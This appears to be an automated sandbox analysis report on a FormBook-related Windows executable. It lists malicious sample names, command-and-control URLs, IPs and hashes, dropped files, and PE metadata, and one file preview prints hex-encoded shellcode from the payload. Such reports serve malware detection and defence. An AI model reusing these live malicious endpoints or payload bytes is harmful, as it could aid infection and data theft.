                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • www.adoby.xyz/ghq5/
                                                  U prilogu lista novih narudzbi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • www.hawalaz.xyz/ercr/
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • www.adoby.xyz/ghq5/
                                                  IMG______6122024.exeGet hashmaliciousFormBookBrowse
                                                  • www.beescy.xyz/pdwc/
                                                  PO14624.exeGet hashmaliciousFormBookBrowse
                                                  • www.beescy.xyz/pdwc/
                                                  188.114.97.3hkLFB22XxS.exeGet hashmaliciousFormBookBrowse
                                                  • www.cavetta.org.mt/yhnb/
                                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • filetransfer.io/data-package/mJcm5Gfa/download
                                                  http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.ioGet hashmaliciousHTMLPhisherBrowse
                                                  • emmalee.sa.com/favicon.ico
                                                  file.exeGet hashmaliciousFormBookBrowse
                                                  • www.cavetta.org.mt/yhnb/
                                                  6Z4Q4bREii.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 000366cm.nyashka.top/phpflowergenerator.php
                                                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • www.coinwab.com/efdt/
                                                  arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.evoolihubs.shop/fwdd/?CbPtaF=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&NV=CzkTp6UpmNmd
                                                  BbaXbvOA7D.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 228282cm.nyashka.top/ExternalimagevmRequestlongpollsqldbLocal.php
                                                  j05KsN2280.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 640740cm.nyashka.top/providerEternalGameWindowstest.php
                                                  QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • filetransfer.io/data-package/L69kvhYI/download

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  www.adoby.xyzDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  www.coinwab.comDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.97.3
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.96.3
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.97.3
                                                  900524362267263.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.97.3
                                                  dokaz o uplati.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • 188.114.97.3
                                                  www.mqmsqkw.lolDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  Payroll List.exeGet hashmaliciousFormBookBrowse
                                                  • 116.213.43.190
                                                  www.personalcaresale.shopDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.200.242
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.200.242
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.21.230
                                                  www.kosherphonestore.com.cdn.hstgr.netDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 154.62.106.34
                                                  Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 77.37.53.194
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.40
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 154.41.249.175
                                                  www.washio.worldDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShkLFB22XxS.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.97.3
                                                  llD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.26.12.205
                                                  http://shippingservice-dhiexpress.dudaone.com/serviceid193811983/Get hashmaliciousUnknownBrowse
                                                  • 172.67.183.214
                                                  FNB-Copy.pdfGet hashmaliciousUnknownBrowse
                                                  • 172.64.41.3
                                                  https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                                  • 172.64.151.101
                                                  arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.74.152
                                                  https://www.aspcp.ukGet hashmaliciousUnknownBrowse
                                                  • 104.16.160.145
                                                  https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 104.26.12.205
                                                  config.lnk.mal.lnkGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 172.67.74.152
                                                  DHOSTING-ASWarsawPolandPLDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.122
                                                  Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.122
                                                  KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.122
                                                  D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  900524362267263.exeGet hashmaliciousFormBookBrowse
                                                  • 109.95.158.127
                                                  ACPCAyUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 162.54.102.167
                                                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • 162.0.213.72
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  doc_Rfq_TNTM Spareparts TM00002916620 exp_pdf.com.exeGet hashmaliciousDarkCloudBrowse
                                                  • 162.55.60.2
                                                  RFQ-ref_05921538.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • 162.0.209.224
                                                  yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                  • 162.55.5.235
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.213.72
                                                  AS-REGRUAttendance list.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  XNP1BNVNqi.elfGet hashmaliciousMiraiBrowse
                                                  • 80.78.252.5
                                                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  PTT request form.exeGet hashmaliciousFormBookBrowse
                                                  • 37.140.192.90
                                                  PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 37.140.192.90
                                                  1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                  • 31.31.196.208
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • 37.140.192.90
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • 37.140.192.90
                                                  Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  3gQmWdKNmxvFltF.exeGet hashmaliciousFormBookBrowse
                                                  • 31.31.196.133
                                                  ASFIBERSUNUCUTRDHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 78.111.111.51
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 78.111.111.51
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • 78.111.111.51
                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 217.195.207.156
                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 217.195.207.156
                                                  SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exeGet hashmaliciousGlupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                  • 217.195.207.156
                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 217.195.207.156
                                                  80OrFCsz0u.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                  • 217.195.207.156
                                                  file.exeGet hashmaliciousPureLog Stealer, RisePro StealerBrowse
                                                  • 217.195.207.156
                                                  SecuriteInfo.com.Win64.Evo-gen.28136.30716.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                  • 217.195.207.156

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\6e1-519

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\PresentationHost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):114688
                                                  Entropy (8bit):0.9746603542602881
                                                  Encrypted:false
                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\aut8BB6.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):7.995933022398111
                                                  Encrypted:true
                                                  SSDEEP:6144:v4OXWgkdDQyOSs3kf/iKLAbKrqgkvxVHUCExFlKL3Uh/:vZXWxdaknDAGPAvlL3M
                                                  MD5:F55F544A432920A1847894F3EA679695
                                                  SHA1:2B574459F719CC41DE187A57335E763FD7716C84
                                                  SHA-256:9E4E28112EC79131789C3E129D08C484817EDC6A21CEBDA99C37D6B3F5F5B9BB
                                                  SHA-512:BB7D7B1278FC3295CBA5A32B3AC326F7788ECC1075134FD565A45DB8FA5992EFDC0AF851D10D799DC3674FC7460BEC22BDBCEF0E02DA47F3F8CBE6AA20C49BC5
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.....G364...S.....P:....O^...HJX5G364S2SZ0OFU8AP9A1I7LV23KH.X5G=).]2.S.n.Tt.qm)X:.<$]T9)'xV&]X['.1?.=3;.(>..~..!9VVeEGR.G364S2S#1F.hX&..!V..,1.)..bU .,...o:W.\.lY&..^/>.S,.JX5G364Sb.Z0.GT8.V. 1I7LV23K.JZ4L2=4S WZ0OFU8AP9.%I7LF23KxNX5Gs64C2SZ2OFS8AP9A1I1LV23KHJX.C366S2SZ0ODUx.P9Q1I'LV23[HJH5G364S"SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LxFV3<JX5S#24S"SZ0]BU8QP9A1I7LV23KHJX.G3V4S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0

                                                  C:\Users\user\AppData\Local\Temp\aut8BE5.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9864
                                                  Entropy (8bit):7.5966586667893985
                                                  Encrypted:false
                                                  SSDEEP:192:na0ZsqLUGeKtxWQa8wgK/IltCvbdpWAsdbSvy/BYWuzdDYkiTfnkdIqj:azqLFLtx3a8wgKJbgdm6/B3uRDcfnkdr
                                                  MD5:CED9A93CDE4CC83DDEBD0E01BE1C5510
                                                  SHA1:77984E46DA0B635579D698D3C9EC8A63C7E9E2C7
                                                  SHA-256:812AF30527DFDC70CAF2665591D8BDFB0DAC6290710E5B4034C64FE6D2B4101E
                                                  SHA-512:3E9A032842EB9D101354C7031598DBED3D47FDE11207C4692C83BD886CE4927DDACB932609B51A25D40A9EE44DC63B16774EC8411D123AFC94B221536806EABB
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3|v9..G.4.X.@8_..kc..i|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.

                                                  C:\Users\user\AppData\Local\Temp\fondaco

                                                  Download File
                                                  Process:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  File Type:ASCII text, with very long lines (28740), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):28740
                                                  Entropy (8bit):3.593970899382246
                                                  Encrypted:false
                                                  SSDEEP:768:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbCO+IFh6q84vfF3if6g0:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RP
                                                  MD5:2E7DA5E61F48B1F70804F19E6D4FBDA5
                                                  SHA1:DB836BFEB5ED2421F22689B9F61ECBA570E3D1A9
                                                  SHA-256:8C87363CD1DC94F6D978154BCDCCAACF4A98BA3520A24742D6EEA08EB9BD6F79
                                                  SHA-512:11419D5BE4BBD7B9BBE8E29B9ED44AD09DC5055E3CEFC39F7E186F2477FF3453C67073588686B4D9EC213E31FA5E532F7244AE032DFE033AAAA988029EA8EBC7
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:606DABF73C37DFE5B6388B40F071263955F8071380D1EFA13173545CE7671ACF380x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c000000668995

                                                  C:\Users\user\AppData\Local\Temp\subbase

                                                  Download File
                                                  Process:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):7.995933022398111
                                                  Encrypted:true
                                                  SSDEEP:6144:v4OXWgkdDQyOSs3kf/iKLAbKrqgkvxVHUCExFlKL3Uh/:vZXWxdaknDAGPAvlL3M
                                                  MD5:F55F544A432920A1847894F3EA679695
                                                  SHA1:2B574459F719CC41DE187A57335E763FD7716C84
                                                  SHA-256:9E4E28112EC79131789C3E129D08C484817EDC6A21CEBDA99C37D6B3F5F5B9BB
                                                  SHA-512:BB7D7B1278FC3295CBA5A32B3AC326F7788ECC1075134FD565A45DB8FA5992EFDC0AF851D10D799DC3674FC7460BEC22BDBCEF0E02DA47F3F8CBE6AA20C49BC5
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.....G364...S.....P:....O^...HJX5G364S2SZ0OFU8AP9A1I7LV23KH.X5G=).]2.S.n.Tt.qm)X:.<$]T9)'xV&]X['.1?.=3;.(>..~..!9VVeEGR.G364S2S#1F.hX&..!V..,1.)..bU .,...o:W.\.lY&..^/>.S,.JX5G364Sb.Z0.GT8.V. 1I7LV23K.JZ4L2=4S WZ0OFU8AP9.%I7LF23KxNX5Gs64C2SZ2OFS8AP9A1I1LV23KHJX.C366S2SZ0ODUx.P9Q1I'LV23[HJH5G364S"SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LxFV3<JX5S#24S"SZ0]BU8QP9A1I7LV23KHJX.G3V4S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.190082518573828
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:nJ8mJTmMf0.exe
                                                  File size:1'234'944 bytes
                                                  MD5:dd560917fd1166f8f9a3ca565e1c3957
                                                  SHA1:07e6f2b8aa9410f9a649353da7ca692b14d4a5c4
                                                  SHA256:8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e
                                                  SHA512:1c5823fb4be16263634e833f6cab448a3746d2b42f088f2f26bb6f73707502dc475c3e057fd239403d6fedf97727bcd4031a39d641e5784d9941bc5aad9b3003
                                                  SSDEEP:24576:pAHnh+eWsN3skA4RV1Hom2KXMmHa44xPAUJDFowvVLwi8QIzLYJ5:wh+ZkldoPK8Ya4cPAUJDFowvVLwUiLO
                                                  TLSH:6C45BE0273E2C032FFABA2739B66F24556BD79254133852F13981D79BD701B2263E663
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                  File Icon

                                                  Icon Hash:aaf3e3e3938382a0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x42800a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66663540 [Sun Jun 9 23:05:36 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F0A4912D3CDh
                                                  jmp 00007F0A49120184h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F0A4912030Ah
                                                  cmp edi, eax
                                                  jc 00007F0A4912066Eh
                                                  bt dword ptr [004C41FCh], 01h
                                                  jnc 00007F0A49120309h
                                                  rep movsb
                                                  jmp 00007F0A4912061Ch
                                                  cmp ecx, 00000080h
                                                  jc 00007F0A491204D4h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F0A49120310h
                                                  bt dword ptr [004BF324h], 01h
                                                  jc 00007F0A491207E0h
                                                  bt dword ptr [004C41FCh], 00000000h
                                                  jnc 00007F0A491204ADh
                                                  test edi, 00000003h
                                                  jne 00007F0A491204BEh
                                                  test esi, 00000003h
                                                  jne 00007F0A4912049Dh
                                                  bt edi, 02h
                                                  jnc 00007F0A4912030Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F0A49120313h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F0A49120365h
                                                  bt esi, 03h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD5 build 40629
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD5 build 40629

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x631f4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000x7134.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xc80000x631f40x63200691a3289d7b0d2898a2ac685463176c1False0.9342956927805801data7.906828215578044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x12c0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                  RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
